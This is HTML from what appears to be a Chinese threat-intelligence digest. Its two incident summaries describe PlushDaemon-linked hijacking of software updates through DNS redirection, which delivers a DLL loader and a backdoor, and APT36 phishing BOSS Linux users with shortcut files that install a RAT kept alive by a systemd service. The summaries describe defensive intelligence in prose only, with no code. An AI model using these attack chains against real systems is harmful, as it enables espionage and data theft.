0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9i4u1nvn"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8majiw20v4" style="font-size: 32px;" data-mpa-action-id="md8majjwecx" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">APT-TX-4801利用软件更新机制隐蔽渗透、精准劫持窃密事件</span></span></p></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8j9i4022ao"><span leaf="">家族团伙别名：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf="">PlushDaemon</span></span></p></li><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">家族团伙主要影响行业：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">制造业、教育</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="color: rgb(0, 82, 255);font-weight: bold;font-size: 14px;text-align: left;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://www.cysecurity.news/2025/11/plushdaemon-group-reroutes-software.html" target="_blank">https://www.cysecurity.news/2025/11/plushdaemon-group-reroutes-software.html</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;"><span leaf="" mpa-font-style="mdig1jnt1o4d" style="font-size: 14px;" data-mpa-action-id="mdig1jo4rhy" data-pm-slice="0 0 []">长期活跃的网络间谍APT-TX-4801组织自 2019 年起持续改进软件更新系统渗透技术，攻击手段不断升级，兼具高度隐蔽性与专业性。此次估计中，该组织先通过扫描网络设备已知漏洞或利用默认弱密码，入侵联网设备并安装 Go 语言编写的 Linux 系统自定义植入工具，其后台静默运行，监控 DNS 查询并将软件更新相关请求重定向至控制服务器，使受害者接收伪造更新包。首个恶意组件伪装成 DLL 文件运行，连接控制节点获取下一阶段工具，该工具在内存中解密执行以规避检测，最终部署高级后门，可窃取系统信息、执行命令、捕捉键盘记录及提取凭据。攻击者还篡改多款软件更新流量，目标覆盖多个应用。此次攻击篡改正常软件更新流程，使受害组织不知情安装恶意软件，破坏系统完整性，让攻击者获得设备完全控制权，严重威胁数据安全与业务连续性。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">APT36利用专属BOSS Linux恶意工具，对相关部门展开持久潜伏攻击</span></span></p></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">Transparent Tribe, TMP.Lapis, Mythic Leopard, APT-C-56, Operation C-Major, Green Havildar, TEMP.Lapis, COPPER FIELDSTONE, ProjectM, Earth Karkaddan</span></span></p></li><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">政法</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://securityonline.info/the-boss-breach-apt36-pivots-to-linux-espionage-with-silent-shortcuts/" target="_blank">https://securityonline.info/the-boss-breach-apt36-pivots-to-linux-espionage-with-silent-shortcuts/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;margin-bottom: 16px;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">APT36近期将攻击重点从传统平台扩展至BOSS Linux环境，利用定向钓鱼邮件投递伪装成正常文档的快捷方式文件，引诱受害者执行恶意脚本。用户点击后，系统在后台下载并运行加密伪装PDF以分散注意力，同时获取核心恶意组件，包括一个64位ELF文件和配套脚本。攻击通过用户级systemd服务实现持久驻留，无需提升权限。进一步分析发现，该ELF文件为经PyInstaller打包的跨平台远程管理工具，可在不同系统中分别隐藏目录并通过注册表或服务机制保持持续控制。其具备命令执行、文件操作与截屏等监控能力，可在受害者不知情的情况下获取系统全面访问权限。本次事件显示APT36正强化对特定Linux环境的定制化渗透能力，若成功入侵，将带来系统控制权丧失与敏感数据泄露等高风险后果。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">02</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in6w7nn3" style="font-size: 20px;" data-mpa-action-id="md8in6x11o66" data-pm-slice="0 0 []">热点攻击手段</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j8nv91q33"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 10 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 